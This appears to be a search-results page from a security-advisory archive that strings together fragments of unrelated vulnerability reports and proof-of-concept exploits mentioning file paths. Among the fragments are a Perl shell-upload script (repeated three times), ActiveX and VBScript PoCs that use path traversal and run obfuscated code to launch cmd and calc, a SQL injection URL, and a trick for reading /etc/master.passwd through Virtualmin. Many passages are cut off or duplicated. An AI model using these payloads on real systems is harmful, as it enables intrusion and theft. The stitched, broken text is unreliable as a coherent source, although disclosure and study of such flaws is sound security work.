| New User, Welcome! Login |
Next Page >>
file path
A stopgap patch was made that tries to neutralize these two bugs. The
patch included applies the first two recommended actions for the
escalation bug. It also destroys session data, but does not completely
destroy the session itself. It also modifies the filter to block the
second attack. However, it will also modify any legitimate file path
with two consecutive dots in it.
This patch can be applied to any installed bytehoard 2.1/epsilon. It
should be installed by running "patch -p1 < PATCH-NAME" in the document
root (where index.php lies).
> .....data
> [MakeFiles]
> 5=CRC Check.exe
> [MakeDef]
> Menu=1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0
> 1=4,O,$B\RC.EXE /v,1 <==Command Execution by replacing the original file path with the command
> 2=3,O,$B\ML.EXE /c /coff /Cp /nologo /I"$I",2 <==Command Execution by replacing the original file path with the command
> 3=5,O,$B\LINK.EXE /SUBSYSTEM:WINDOWS /RELEASE /VERSION:4.0 /LIBPATH:"$L" /OUT:"$5",3,4 <==Command Execution by replacing the original file path with the command
> 4=0,0,,5
> 5=rsrc.obj,O,$B\CVTRES.EXE,rsrc.res <==Command Execution by replacing the original file path with the command
> 7=0,0,"$E\OllyDbg",5
.....data
[MakeFiles]
5=CRC Check.exe
[MakeDef]
Menu=1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0
1=4,O,$B\RC.EXE /v,1 <==Command Execution by replacing the original file path with the command
2=3,O,$B\ML.EXE /c /coff /Cp /nologo /I"$I",2 <==Command Execution by replacing the original file path with the command
3=5,O,$B\LINK.EXE /SUBSYSTEM:WINDOWS /RELEASE /VERSION:4.0 /LIBPATH:"$L" /OUT:"$5",3,4 <==Command Execution by replacing the original file path with the command
4=0,0,,5
5=rsrc.obj,O,$B\CVTRES.EXE,rsrc.res <==Command Execution by replacing the original file path with the command
7=0,0,"$E\OllyDbg",5
tmpdir = e_mkdtemp("tnef-attachment-XXXXXX");
if (tmpdir == NULL)
return;
filepath = tmpdir;
name = g_build_filename(tmpdir, ".evo-attachment.tnef",
NULL);
out = camel_stream_fs_new_with_name(name, O_RDWR|O_CREAT, 0666);
143 |{
144 | $_NOW = IPSDebug::getMemoryDebugFlag();
145 |
146 | $module = ipsRegistry::$current_module;
147 | $section = ipsRegistry::$current_section;
148 | $filepath = IPSLib::getAppDir( IPS_APP_COMPONENT ) .
'/' . self::$modules_dir . '/' . $module . '/';
149 |
150 | /* Got a section? */
151 | if ( ! $section )
152 | {
Release Type: Co-ordinated, responsible disclosure
2. Vulnerability Information
------------------------------------------------------------------------------------------------------------------------
Class: Cross Site Request Forgery, Cross Site Scripting, File Path
Disclosure, Local File Inclusion, Authentication Bypass and PHP Command
Injection
Remotely Exploitable: Yes
Locally Exploitable: No
2. Vulnerability Information
----------------------------------------------------------------------------------------------
Class: SQL Injection, Insecure File Upload, Cross Site Scripting,
Filepath Disclosure
Remotely Exploitable: Yes
Locally Exploitable: No
3. Vulnerability Description
handle certain utf8 characters in regular expressions. If a user or
automated system were tricked into using a specially crafted expression,
a remote attacker could crash the application, leading to a denial
of service. Ubuntu 8.10 was not affected by this issue. (CVE-2008-1927)
A race condition was discovered in the File::Path Perl module's rmtree
function. If a local attacker successfully raced another user's call
of rmtree, they could create arbitrary setuid binaries. Ubuntu 6.06
and 8.10 were not affected by this issue. (CVE-2008-5302)
A race condition was discovered in the File::Path Perl module's rmtree
{
/* method RefreshAddRemovePrograms */
}
/* DISPID=14 */
function ShellExec(
/* VT_BSTR [8] [in] */ $FilePath,
/* VT_BSTR [8] [in] */ $Params
)
{
/* method ShellExec */
}
handle certain utf8 characters in regular expressions. If a user or
automated system were tricked into using a specially crafted expression,
a remote attacker could crash the application, leading to a denial
of service. Ubuntu 8.10 was not affected by this issue. (CVE-2008-1927)
A race condition was discovered in the File::Path Perl module's rmtree
function. If a local attacker successfully raced another user's call
of rmtree, they could create arbitrary setuid binaries. Ubuntu 6.06
and 8.10 were not affected by this issue. (CVE-2008-5302)
A race condition was discovered in the File::Path Perl module's rmtree
original one: http://retrogod.altervista.org/9sg_CA_poc.html
-->
<html><object classid='clsid:F13D3742-6C4F-4915-BF91-784BA02DD0BE' id='UmxEventCliLib'/>
</object><script language='vbscript'>
filePath="..\..\..\..\..\..\..\boot.ini"
UmxEventCliLib.SaveToFile filePath
</script></html>
It's possible to view any file on the server because Virtualmin doesn't drop
root privileges to perform some of its actions.
Example:
Use the "Execute SQL" feature in the mysql module by passing
"/etc/master.passwd" parameter as the file path to the .sql file:
-- cut --
Output from SQL commands in file /etc/master.passwd ..
ERROR 1064 (42000) at line 3: You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the
POC:
========
Function WriteTextFile (
ByVal str As Variant ,
ByVal FilePath As Variant
) As String
0:000> g
(d2c.f84): Unknown exception - code 0eedfade (first chance)
The RSS module allows SugarCRM users to add RSS feeds to their personal
RSS list. The application expects an URL value pointing to a valid RSS
feed.
However, the URL variable value is not properly sanitised and any URI
value can be entered instead. In this particular case, it was discovered
that it is possible to enter a file path to any files on the local
system hosting the SugarCRM application.
As a result SugarCRM does not display the new RSS feed in the list as it
is not a valid RSS URL Feed. However, the application creates a local
file with the filename of the md5 hash of the URL entered. The file is
use HTTP::Request::Common;
$ua = $ua = LWP::UserAgent->new;;
$res = $ua->request(POST 'http:www.example.com/[sitexs]/adm/visual/upload.php',
Content_Type => 'form-data',
Content => [
UPLOAD => ["Your shell file path", "1.gif.php", "Content-Type" =>
"image/gif"],submit => 'true',type => 'images',path => '',process => 'true',
],
);
print $res->as_string();
-----------------------------------------------------------------------------------
use HTTP::Request::Common;
$ua = $ua = LWP::UserAgent->new;;
$res = $ua->request(POST 'http:www.example.com/[sitexs]/adm/visual/upload.php',
Content_Type => 'form-data',
Content => [
UPLOAD => ["Your shell file path", "1.gif.php", "Content-Type" =>
"image/gif"],submit => 'true',type => 'images',path => '',process => 'true',
],
);
print $res->as_string();
-----------------------------------------------------------------------------------
use HTTP::Request::Common;
$ua = $ua = LWP::UserAgent->new;;
$res = $ua->request(POST 'http:www.example.com/[sitexs]/adm/visual/upload.php',
Content_Type => 'form-data',
Content => [
UPLOAD => ["Your shell file path", "1.gif.php", "Content-Type" =>
"image/gif"],submit => 'true',type => 'images',path => '',process => 'true',
],
);
print $res->as_string();
-----------------------------------------------------------------------------------
*7240 : execute "write" a:file
4. Footnotes
[1] Really a URL -- local file path without a scheme is a special case; we
haven't explored remote issues, but they might be interesting.
[2] shellescape() was introduced in patch 7.0.111, and is not used at all as
of version 7.1.298. Naive quoting is in being used instead, throughout the
code. A typical example from the ``netrwFileHandlers.vim'' file:
Ganeti, an open source virtualisation manager, suffers from an input
validation bug that poses a security risk.
The vulnerability applies to the commands submitted, either locally via
gnt-* commands or remotely via the HTTP API, to the machine acting as a
cluster master. Validation for a file path argument is missing resulting
in arbitrary code execution, local exploitation applies to any user with
rights to execute ganeti commands while remote exploitation applies to
configured users authenticated over the ganeti RAPI.
While the local exploitation is a non-issue for the root user, which can
Normally the value of "target" can only be set as the above three
values, any other values will be filtered.
Nevertheless, the parameter injection vulnerability can set the
value of "target" arbitrarily, if the value is a valid file path,
Akamai Download Manager will download the target file directly in it
without any interaction with users. As a result, attackers can
construct a vicious web page to download a file that could be
controled to any location of the user's system.
Hello BugtraQ, I tried to reproduce this advisory.
And found out that its impossible.
When you create a index.php file, executing admin.template_engine.php,
This index.php contains
require_once("lib/template.class.php");
but this is wrong file path and executing index.php stop with error
Warning: require_once(./lib/template.class.php)
Fatal error: require_once().
Goood Luck.
The above code comes from /admin/plog-themes.php @ lines 40-57 and
shows a possible avenue for attackers to use in order to update the
'theme_dir' in the database. The only trick to this is we have make
the "activate" parameter pass both the file_exists() check, the
basename() check, and still have it update the "theme"dir" data in
the database with our arbitrary file path.
/admin/plog-themes.php?activate=%00', `theme_dir` = concat
(feed_title,char(0)) -- *
The above url will successfully copy the data that is contained
Description
===========
Mozilla discovered that Opera does not handle input to file form fields
properly, allowing scripts to manipulate the file path (CVE-2008-1080).
Max Leonov found out that image comments might be treated as scripts,
and run within the wrong security context (CVE-2008-1081). Arnaud
reported that a wrong representation of DOM attribute values of
imported XML documents allows them to bypass sanitization filters
(CVE-2008-1082).
beyond the scope of this report, it is not known what web servers will
expose this vulnerability to a remote attacker.
C. Relative File Path Writing (CVE-2009-0841)
Severity: Medium/High
The "mapserv" CGI application can be tricked into creating files in
arbitrary locations in the file system with arbitrary names.
Symantec PcAnywhere version 10 – 12.5
==================================================
2) Severity Rating: Low
==================================================
3) Description of Vulnerability
A local format string vulnerability was discovered within Symantec PcAnywhere version 10 thru 12.5 .The vulnerability is due to improper processing of format strings within (.CHF) remote control file names or associated file path . When special crafted format strings are entered as the file name (%s%s%s%s%s.chf) or within the path of the CHF file the format string vulnerability is triggered. Making it possible to read/write arbitrary memory and at a minimum cause a denial of service condition.
==================================================
4) Solution : Upgrade to version 12.5 SP1
==================================================
5) Time Table:
01/06/2009 Reported Vulnerability to Vendor.
<OBJECT classid='clsid:01110800-3E00-11D2-8470-0060089874ED' width=1 height=1 id='DNAEditorCtl' />
</OBJECT>
<SCRIPT language='VBScript'>
<!--
sh="<HTML><SCRIPT LANGUAGE=VBScript>" + unescape("Execute%28unescape%28%22Set%20s%3DCreateObject%28%22%22WScript.Shell%22%22%29%250D%250As.Run%20%22%22cmd%20%252fc%20start%20calc%22%22%22%29%29") + "<" + Chr(47) + "SCRIPT><" + Chr(47) + "HTML>"
'file path is injected in msinfo.htm, you can see the code by an hex editor, some limit with *number* of chars, some problem with newlines, resolved with vbscript code evaluation by Execute(), a popup says Unable to post... click Ok or close it and you are pwned
DNAEditorCtl.PackageFiles sh + "../../../../../../../../../WINDOWS/PCHEALTH/HELPCTR/System/sysinfo/msinfo.htm"
'launch the script and calc.exe trough the Help and Support Center Service
document.write("<iframe src=""hcp://system/sysinfo/msinfo.htm"">")
-->
</SCRIPT>
How to determine if the installation is affected
Locate the following file on the respective platform:
Platform
File path
Windows
"%NH_HOME%\extensions\local\42339.log"
Unix
0348FBD2 90 NOP
...
Usage: php 9sg_jetcast_poc.php
It creates 4 files on your desktop, it says which will hit the right offset on
your system (file path is important to achieve arbitrary code execution on a victim user
so an attacker should persuade him to try to stream them ...)
It works by dragging the file on it or by right clicking and selecting "Add files ...",
not 100% reliable, version specific...
-------------------------------------------------------------------------------------
*/
III. ANALYSIS
Exploitation allows attackers to read arbitrary files from the server
machine. The tftp/mftp daemon runs with SYSTEM level privileges, so any
file readable by SYSTEM with a known file path can be downloaded without
authentication.
IV. DETECTION
iDefense confirmed the existence of this vulnerability in Altiris
Exploitation allows attackers to execute arbitrary code with system
level privilege.
Exploitation requires that attackers are able to create a specially
constructed file path on the machine running the Trend Micro product.
This could be the local machine to gain SYSTEM level privileges, or
could be conducted remotely by writing a file to an accessible network
share.
IV. DETECTION
Next Page>>
|
|
|
